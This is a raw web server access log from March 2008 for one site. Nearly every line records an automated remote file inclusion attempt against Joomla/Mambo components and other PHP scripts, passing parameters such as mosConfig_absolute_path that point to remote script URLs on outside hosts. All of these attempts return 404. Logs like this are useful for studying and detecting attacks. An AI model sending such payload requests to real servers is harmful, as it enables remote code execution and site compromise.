62.75.158.234 - - [27/Mar/2008:09:15:42 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:15:42 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:15:42 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:15:42 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.12.244.192 - - [27/Mar/2008:09:15:44 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [27/Mar/2008:09:15:45 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [27/Mar/2008:09:15:45 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:15:48 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:15:48 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:15:48 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.155.107.10 - - [27/Mar/2008:09:15:55 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.155.107.10 - - [27/Mar/2008:09:15:55 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.155.107.10 - - [27/Mar/2008:09:15:56 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.9.66 - - [27/Mar/2008:09:16:05 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.9.66 - - [27/Mar/2008:09:16:06 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.76.23.179 - - [27/Mar/2008:09:16:06 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.9.66 - - [27/Mar/2008:09:16:06 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.76.23.179 - - [27/Mar/2008:09:16:06 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.23.179 - - [27/Mar/2008:09:16:06 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.77.25 - - [27/Mar/2008:09:16:16 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.52 - - [27/Mar/2008:09:16:20 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:16:40 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.61.101 - - [27/Mar/2008:09:16:43 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:09:16:45 -0700] "GET /logs/access_080306.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:09:16:46 -0700] "GET /logs//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.186.11.35 - - [27/Mar/2008:09:16:54 -0700] "GET /logs/access.log//index.php?option=com_search=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.186.11.35 - - [27/Mar/2008:09:16:54 -0700] "GET //index.php?option=com_search=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.186.11.35 - - [27/Mar/2008:09:16:55 -0700] "GET /logs//index.php?option=com_search=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:09:16:57 -0700] "GET /logs/access_080211.log//skin/zero_vote/error.php?file=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:09:16:58 -0700] "GET /logs//skin/zero_vote/error.php?file=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.12.244.192 - - [27/Mar/2008:09:16:59 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:09:16:59 -0700] "GET /logs/access_080207.log//skin/zero_vote/error.php?file=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.155.107.10 - - [27/Mar/2008:09:17:02 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.168.161.227 - - [27/Mar/2008:09:17:03 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://brotherhoodlounge.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.189.9.54 - - [27/Mar/2008:09:17:12 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.9.54 - - [27/Mar/2008:09:17:12 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.9.54 - - [27/Mar/2008:09:17:12 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.186.11.35 - - [27/Mar/2008:09:17:15 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.9.54 - - [27/Mar/2008:09:17:27 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:17:41 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:17:41 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:17:41 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.19.178.201 - - [27/Mar/2008:09:17:42 -0700] "GET /index.php?option=com_sef&task=take&catid=&mosConfig_absolute_path=http://www.motoxclub.org.au/forum/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
84.19.178.201 - - [27/Mar/2008:09:17:42 -0700] "GET /logs/index.php?option=com_sef&task=take&catid=&mosConfig_absolute_path=http://www.motoxclub.org.au/forum/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.76.23.179 - - [27/Mar/2008:09:17:46 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.160.86 - - [27/Mar/2008:09:17:48 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:09:17:48 -0700] "GET /logs/access_080223.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.160.86 - - [27/Mar/2008:09:17:49 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.160.86 - - [27/Mar/2008:09:17:49 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.9.66 - - [27/Mar/2008:09:17:54 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:18:15 -0700] "GET /logs/access_080306.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:18:28 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.186.11.35 - - [27/Mar/2008:09:18:52 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:19:13 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:19:14 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:19:14 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.243.214.11 - - [27/Mar/2008:09:19:14 -0700] "GET /shop/index.php?action=http://www.pokerchipplanet.com/.../test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
84.243.214.11 - - [27/Mar/2008:09:19:14 -0700] "GET /logs/shop/index.php?action=http://www.pokerchipplanet.com/.../test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:19:29 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.168.161.227 - - [27/Mar/2008:09:19:31 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://brotherhoodlounge.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:19:32 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:19:32 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:19:33 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.146.175.6 - - [27/Mar/2008:09:19:52 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.146.175.6 - - [27/Mar/2008:09:19:52 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.146.175.6 - - [27/Mar/2008:09:19:52 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:09:19:52 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?file=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:20:22 -0700] "GET /logs/access_080313.log/index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:20:23 -0700] "GET /index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:20:23 -0700] "GET /logs/index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:09:20:28 -0700] "GET /logs/access_071227.log//skin/zero_vote/error.php?file=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.196.43.232 - - [27/Mar/2008:09:20:28 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.196.43.232 - - [27/Mar/2008:09:20:28 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.196.43.232 - - [27/Mar/2008:09:20:29 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:09:20:37 -0700] "GET /logs/access_080313.log/index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:09:20:38 -0700] "GET /index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:09:20:38 -0700] "GET /logs/index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:20:41 -0700] "GET /logs/access_080219.log//main.php?sayfa=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:20:41 -0700] "GET /logs/access_080306.log/index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:20:41 -0700] "GET //main.php?sayfa=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:20:41 -0700] "GET /logs//main.php?sayfa=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.160.86 - - [27/Mar/2008:09:21:02 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:21:19 -0700] "GET /logs/access_080225.log//main.php?sayfa=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:09:21:20 -0700] "GET /logs/access_080306.log/index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.74 - - [27/Mar/2008:09:21:48 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:22:00 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:22:10 -0700] "GET /logs/access.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:22:11 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:22:11 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.96.199.124 - - [27/Mar/2008:09:22:33 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.96.199.124 - - [27/Mar/2008:09:22:34 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.23.229.105 - - [27/Mar/2008:09:22:34 -0700] "GET /logs/access_080127.log/index.php?option=com_newsfeeds&task=view&feedid=42&Itemid=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.96.199.124 - - [27/Mar/2008:09:22:34 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:22:54 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.146.175.6 - - [27/Mar/2008:09:23:03 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.214.50.208 - - [27/Mar/2008:09:23:03 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [27/Mar/2008:09:23:04 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [27/Mar/2008:09:23:04 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.111 - - [27/Mar/2008:09:23:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.94 - - [27/Mar/2008:09:23:48 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
198.169.127.116 - - [27/Mar/2008:09:23:49 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:23:59 -0700] "GET /logs/access_080219.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:09:24:11 -0700] "GET /index.php?pagina1=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.96.199.124 - - [27/Mar/2008:09:25:18 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:09:25:44 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:09:25:45 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:09:25:50 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:26:18 -0700] "GET /logs/access.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:26:35 -0700] "GET /logs/access_080313.log/index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:26:35 -0700] "GET /index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:26:36 -0700] "GET /logs/index1.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.7.194 - - [27/Mar/2008:09:26:41 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
